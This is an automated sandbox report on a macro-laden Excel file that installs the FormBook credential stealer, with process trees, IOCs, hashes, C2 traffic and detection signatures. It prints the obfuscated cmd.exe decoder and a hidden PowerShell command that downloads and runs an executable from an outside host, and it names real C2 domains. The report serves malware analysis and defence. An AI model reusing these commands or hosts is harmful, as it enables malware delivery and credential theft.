analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Book1 - Copy.xls

Full analysis: https://app.any.run/tasks/bae23c3d-e3a0-4b48-a100-df9895636457
Verdict: Malicious activity
Threats:

FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus.

Analysis date: January 22, 2019, 13:19:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
formbook
stealer
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 21 20:13:51 2019, Last Saved Time/Date: Mon Jan 21 20:13:57 2019, Security: 0
MD5:

57F79EB913AA7E4BCC88FDBE3232EE0F

SHA1:

08EBC2931DC4C810B88939FE489A08CBDD7CF64F

SHA256:

0EFF4D8CD8D9F57496EEFB65B2AF15BE8A6ABC92E0FD81B7D01A29B30556C6B1

SSDEEP:

1536:xk3hOdsylKlgryzc4bNhZFGzE+cL2knAWsjRUPcspcwucbHcAgcJXcHhcN6kca06:xk3hOdsylKlgryzc4bNhZFGzE+cL2knF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2964)
    • Starts CMD.EXE for commands execution

      • EXCEL.EXE (PID: 2964)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2300)
    • Application was dropped or rewritten from another process

      • 342141.exe (PID: 2828)
    • Connects to CnC server

      • explorer.exe (PID: 284)
    • Formbook was detected

      • NETSTAT.EXE (PID: 3504)
      • Firefox.exe (PID: 2100)
    • Changes the autorun value in the registry

      • NETSTAT.EXE (PID: 3504)
    • FORMBOOK was detected

      • explorer.exe (PID: 284)
    • Actions looks like stealing of personal data

      • NETSTAT.EXE (PID: 3504)
    • Stealing of credential data

      • NETSTAT.EXE (PID: 3504)
  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 3020)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3020)
      • NETSTAT.EXE (PID: 3504)
    • Creates files in the user directory

      • powershell.exe (PID: 304)
      • NETSTAT.EXE (PID: 3504)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 304)
    • Uses NETSTAT.EXE to discover network connections

      • explorer.exe (PID: 284)
    • Loads DLL from Mozilla Firefox

      • NETSTAT.EXE (PID: 3504)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2964)
    • Starts Microsoft Office Application

      • explorer.exe (PID: 284)
    • Reads settings of System Certificates

      • powershell.exe (PID: 304)
    • Creates files in the user directory

      • Firefox.exe (PID: 2100)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

Author: -
LastModifiedBy: -
Software: Microsoft Excel
CreateDate: 2019:01:21 20:13:51
ModifyDate: 2019:01:21 20:13:57
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: Sheet1
HeadingPairs:
  • Worksheets
  • 1
CompObjUserTypeLen: 31
CompObjUserType: Microsoft Excel 2003 Worksheet
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
9
Malicious processes
6
Suspicious processes
1

Behavior graph

Click at the process to see the details
start excel.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 342141.exe no specs #FORMBOOK netstat.exe cmd.exe no specs #FORMBOOK explorer.exe #FORMBOOK firefox.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2964"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3020cmd.exe /v:ON /c"set released= && set gathering=2;-m%,vJ41B~HKqhcxzlpd.5'GQN:MSy\8FjYROC/TPo0AkZ)wDifsa9UbnL (VWE7@6erugXtI3 && for %H in (16,3,21,22,68,17,68,60,40,16,60,20,43,49,68,69,53,15,68,19,19,60,2,49,51,58,21,43,49,53,73,31,19,68,60,15,51,21,21,68,58,60,61,58,68,49,2,43,57,35,68,16,73,60,30,31,53,73,68,3,22,27,68,73,22,63,68,57,39,19,51,68,58,73,48,22,50,43,49,58,19,43,54,21,34,51,19,68,61,24,15,73,73,20,53,28,40,40,57,54,16,46,20,54,71,68,2,51,58,16,22,16,43,3,40,73,49,68,69,46,22,68,17,68,24,5,24,4,41,64,29,42,4,32,75,8,0,9,8,9,22,68,17,68,24,48,1,3649) DO (set released=!released!!gathering:~%H,1!) && if %H == 3649 call !released:~-147!" && %tmp%/342141.exeC:\Windows\system32\cmd.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2300cmd.exe /c powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://backpage-inc.com/twerk.exe','C:\Users\admin\AppData\Local\Temp\342141.exe'); C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
304powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('https://backpage-inc.com/twerk.exe','C:\Users\admin\AppData\Local\Temp\342141.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2828C:\Users\admin\AppData\Local\Temp/342141.exeC:\Users\admin\AppData\Local\Temp\342141.execmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3504"C:\Windows\System32\NETSTAT.EXE"C:\Windows\System32\NETSTAT.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Netstat Command
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2424/c del "C:\Users\admin\AppData\Local\Temp\342141.exe"C:\Windows\System32\cmd.exeNETSTAT.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
284C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2100"C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe
NETSTAT.EXE
User:
admin
Company:
Mozilla Corporation
Integrity Level:
MEDIUM
Description:
Firefox
Exit code:
0
Version:
61.0.2
Total events
856
Read events
748
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
75
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2964EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE090.tmp.cvr
MD5:
SHA256:
304powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QXY0WJGZN8L2Y9FE3CD4.temp
MD5:
SHA256:
304powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20ed33.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
304powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3504NETSTAT.EXEC:\Users\admin\AppData\Roaming\219N9U6T\219logrc.inibinary
MD5:2855A82ECDD565B4D957EC2EE05AED26
SHA256:88E38DA5B12DD96AFD9DC90C79929EC31D8604B1AFDEBDD5A02B19249C08C939
304powershell.exeC:\Users\admin\AppData\Local\Temp\342141.exeexecutable
MD5:0C0863A1734DA58B0C460380DFF03337
SHA256:A0D4333F37F1982DF45CBB916AF69A64EEA91697E9CCAE4585A6AEFD3F389576
3504NETSTAT.EXEC:\Users\admin\AppData\Roaming\219N9U6T\219logim.jpegimage
MD5:DA5075AE359AA1691F5C61A6651FDA70
SHA256:818A7CE5A230D69E49C5F0456E25833916F47FDFCA7BE31309345EFB6411DA87
2100Firefox.exeC:\Users\admin\AppData\Roaming\219N9U6T\219logrf.inibinary
MD5:53028481B5B5795F1501241CCC7ABFF6
SHA256:75B5F3045E20C80F264568707E2D444DC7498DB119D9661AE51A91575960FC5A
3504NETSTAT.EXEC:\Users\admin\AppData\Roaming\219N9U6T\219logri.inibinary
MD5:D63A82E5D81E02E399090AF26DB0B9CB
SHA256:EAECE2EBA6310253249603033C744DD5914089B0BB26BDE6685EC9813611BAAE
3504NETSTAT.EXEC:\Users\admin\AppData\Roaming\219N9U6T\219logrv.inibinary
MD5:BA3B6BC807D4F76794C4B81B09BB9BA5
SHA256:6EEBF968962745B2E9DE2CA969AF7C424916D4E3FE3CC0BB9B3D414ABFCE9507
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
6
DNS requests
10
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
284
explorer.exe
GET
66.96.161.139:80
http://monquagifts.com/results/?kHihzrH=OjtISGjLkzKg8R3uC2LpDZmuUtN0ZroK8s0TArifj+gK8lqMn7fTXOOOK+j/wCHujWmEMQ==&D8RD=FdQlaBIxb4stS250
US
malicious
284
explorer.exe
POST
157.7.44.170:80
http://leben-club.com/results/
JP
malicious
284
explorer.exe
POST
157.7.44.170:80
http://leben-club.com/results/
JP
malicious
284
explorer.exe
POST
157.7.44.170:80
http://leben-club.com/results/
JP
malicious
284
explorer.exe
GET
404
157.7.44.170:80
http://leben-club.com/results/?kHihzrH=i6jUcv2OebaDVAuOYgLNjSkU2F7JUOIHVlrWEwFisGtMLDwtX9IiNPQKVPXxVucmOFuRqw==&D8RD=FdQlaBIxb4stS250&sql=1
JP
html
1.53 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
284
explorer.exe
66.96.161.139:80
monquagifts.com
The Endurance International Group, Inc.
US
malicious
304
powershell.exe
162.210.96.228:443
backpage-inc.com
Steadfast
US
unknown
284
explorer.exe
157.7.44.170:80
leben-club.com
GMO Internet,Inc
JP
malicious

DNS requests

Domain
IP
Reputation
backpage-inc.com
  • 162.210.96.228
unknown
elvdun.net
unknown
dns.msftncsi.com
  • 131.107.255.255
shared
monquagifts.com
  • 66.96.161.139
malicious
drivemycar1427247.biz
unknown
j-lintex.com
unknown
healthyhappyorthopedic.com
unknown
leben-club.com
  • 157.7.44.170
malicious
abysscoin.com
unknown

Threats

PID
Process
Class
Message
284
explorer.exe
A Network Trojan was detected
SC SPYWARE Trojan-Spy.Win32.Noon
284
explorer.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (GET)
284
explorer.exe
A Network Trojan was detected
SC SPYWARE Trojan-Spy.Win32.Noon
284
explorer.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious HTTP-GET request with body and minimal header
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (GET)
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (POST)
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] FormBook CnC Checkin (POST)
284
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] TrojanSpy:FormBook CnC Checkin (POST)
4 ETPRO signatures available at the full report
No debug info